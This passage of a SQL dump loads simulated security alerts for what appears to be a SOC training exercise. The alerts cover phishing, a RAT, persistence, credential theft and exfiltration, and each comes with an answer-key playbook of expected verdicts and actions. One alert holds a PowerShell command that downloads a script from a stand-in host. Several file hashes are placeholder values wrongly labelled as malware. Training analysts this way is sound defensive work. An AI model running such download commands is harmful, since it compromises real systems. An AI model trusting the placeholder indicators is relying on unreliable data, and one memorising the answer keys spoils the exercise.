4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T13:45:32Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-3421\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.15\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"detection_module\\\":\\\"EncryptedChannelMonitor\\\",\\\"alert\\\":\\\"Suspicious exfiltration detected via encrypted channel\\\",\\\"extra_info\\\":{\\\"encryption_type\\\":\\\"TLS 1.3\\\",\\\"data_volume\\\":\\\"5MB\\\",\\\"destination_domain\\\":\\\"malicious-actor.xyz\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1086, 'Phishing Email with Malicious Attachment', 'medium', 'Email Gateway Logs', 'A spear-phishing email targeting military personnel was detected. The email contained a malicious attachment disguised as a legitimate document. The sender\'s IP is associated with previous phishing campaigns.', 'Social Engineering', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-16T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"destination_user\":\"john.doe@military.gov\",\"email_subject\":\"Urgent: Action Required\",\"attachment_name\":\"Official_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"sender_email\":\"trusted.source@domain.com\",\"recipient_email\":\"john.doe@military.gov\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP is linked to several phishing campaigns targeting government entities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"The hash is associated with a known malicious document used in phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email address is spoofed and previously used in phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.795Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1087, 'Execution of Python-Based RAT', 'high', 'Endpoint Detection and Response (EDR)', 'A Python-based Remote Access Trojan (RAT) was executed on the victim\'s machine after a malicious attachment was opened. This action has established a foothold within the network, potentially allowing the attacker to gain further access.', 'Malware Execution', 'T1059.006 - Command and Scripting Interpreter: Python', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_type\":\"process_creation\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.42\",\"destination_ip\":\"203.0.113.56\",\"process_name\":\"python.exe\",\"command_line\":\"python.exe C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_rat.py\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_rat.py\",\"signature_status\":\"unsigned\",\"external_ip\":\"203.0.113.56\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with Python-based RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_rat.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"The file name indicates potential malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the 
alert.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1088, 'Establishing Persistence with Scheduled Tasks', 'medium', 'Windows Task Scheduler Logs', 'The Remote Access Trojan (RAT) has set up a scheduled task on the compromised system. This task ensures the malware is executed at regular intervals, even after system reboots, thereby maintaining persistent access.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":106,\"ProviderName\":\"Microsoft-Windows-TaskScheduler\",\"Channel\":\"Microsoft-Windows-TaskScheduler/Operational\",\"EventRecordID\":12345,\"Logged\":\"2023-10-15T14:32:10Z\",\"TaskName\":\"\\\\System\\\\CriticalUpdate\",\"TaskActionType\":\"Execute\",\"TaskContent\":{\"Command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Arguments\":\"/c C:\\\\Users\\\\Public\\\\malware.exe\",\"UserId\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"HostIP\":\"10.0.0.15\",\"AttackerIP\":\"203.0.113.45\",\"FileHash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"User\":\"compromisedUser\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash of the malware file executed by the scheduled task.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.797Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"ProviderName\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"Channel\\\":\\\"Microsoft-Windows-TaskScheduler/Operational\\\",\\\"EventRecordID\\\":12345,\\\"Logged\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\System\\\\\\\\CriticalUpdate\\\",\\\"TaskActionType\\\":\\\"Execute\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\malware.exe\\\",\\\"UserId\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"HostIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\",\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"User\\\":\\\"compromisedUser\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1089, 'Credential Harvesting and Lateral Movement', 'high', 'Network Traffic Analysis', 'The RAT begins harvesting credentials, allowing the attackers to move laterally across the network and compromise additional systems. Observed network traffic indicates the use of stolen credentials to access multiple internal systems.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:25:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"jdoe\",\"credentials_used\":true,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"credential_harvester.exe\",\"session_id\":\"abc123def456\",\"event_id\":\"EID1004\"}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials used in unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as a credential harvesting tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Malware file used for credential 
harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1090, 'Data Exfiltration via Encrypted Channels', 'high', 'Firewall and Proxy Logs', 'In the final stage, sensitive data is exfiltrated out of the network using encrypted channels, completing the espionage operation. The attacker utilized encrypted HTTPS traffic to transfer data to a command and control server.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:45:00Z\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"protocol\":\"HTTPS\",\"hostname\":\"malicious-server.com\",\"uri\":\"/upload\",\"method\":\"POST\",\"user\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"sensitive_data.zip\",\"bytes_sent\":1048576}', '2026-01-24 03:41:05', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive information.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1091, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email from a suspected attacker was detected. The email contained a malicious attachment designed to grant initial access to the bank\'s network. The attachment was flagged due to its similarity to known malware used by the Poseidon Group.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T09:15:32Z\",\"email_id\":\"e1234567890\",\"source_ip\":\"203.0.113.45\",\"source_email\":\"attack@poseidon-group.com\",\"destination_email\":\"employee@bank.com\",\"subject\":\"Urgent: Account Verification Required\",\"attachment_name\":\"Invoice_12345.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"attachment_blocked\",\"reason\":\"malicious_attachment_detected\"}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Poseidon Group.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attack@poseidon-group.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:22.801Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1092, 'Unauthorized PowerShell Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'An unauthorized PowerShell script execution was detected on host 192.168.1.45. The script was executed using a remote command initiated from a compromised account. The script tried to connect to an external IP 203.0.113.5, known for malicious activities, in an attempt to download additional payloads. This activity is part of an ongoing attempt to establish command and control within the network. Immediate attention and remediation are required to prevent further compromise.', 'Command and Control', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4625\",\"host\":\"192.168.1.45\",\"username\":\"jdoe\",\"process\":\"powershell.exe\",\"command_line\":\"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.WebClient).DownloadFile(\'http://203.0.113.5/malicious.ps1\', \'C:\\\\Users\\\\jdoe\\\\malicious.ps1\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"external_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\malicious.ps1\",\"alert_id\":\"alert-987654321\",\"alert_description\":\"Execution of a malicious PowerShell script detected.\"}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple command and control activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash found in relation to a known malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Audit\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR System\",\"verdict\":\"malicious\",\"details\":\"File identified as a malicious script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1093, 'Data Exfiltration Attempt through Unusual Network Traffic', 'high', 'Network Traffic Analysis', 'In the final stage, the Poseidon Group attempts to exfiltrate sensitive data, threatening to leak it unless their extortion demands are met. Analyzing unusual outbound traffic patterns can help intercept this data before it leaves the network.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:07.000Z\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.89\",\"protocol\":\"HTTPS\",\"bytes_sent\":987654321,\"filename\":\"financial_data_report.zip\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\",\"destination_port\":443}', '2026-01-25 20:00:09', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Private IP address within the local network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Poseidon Group\'s known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Poseidon Group for data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_data_report.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file name indicative of sensitive 
